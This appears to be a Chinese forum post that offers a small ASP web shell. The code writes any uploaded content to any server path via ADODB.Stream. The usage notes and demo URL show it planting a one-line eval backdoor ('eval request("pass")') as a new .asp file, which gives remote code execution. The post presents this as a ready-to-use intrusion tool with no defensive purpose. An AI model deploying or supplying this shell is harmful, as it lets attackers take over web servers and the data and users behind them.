|
- <%
- On Error Resume Next
- set gl=server.CreateObJeCt("Adodb.Stream")
- gl.Open
- gl.Type=2
- gl.CharSet="gb2312"
- gl.writetext request("code")
- gl.SaveToFile server.mappath(request("path")),2
- gl.Close
- set gl=nothing
- response.redirect request("path")
- %>
复制代码
使用方法:此马命名为x.asp 在URL上 编写 path=1.txt 则会在当前目录中自动创建1.txt文件.不仅限txt, asp、aspx、php等也可以,就看服务器支持不支持了。
在URL上 编写 code=<%eval request("pass")%>时,会将code的值自动写入到1.txt中
使用demo: http://xxxxx.com/upload/x*****.asp?path=1.asp&code=<%eval request("pass")%> |
|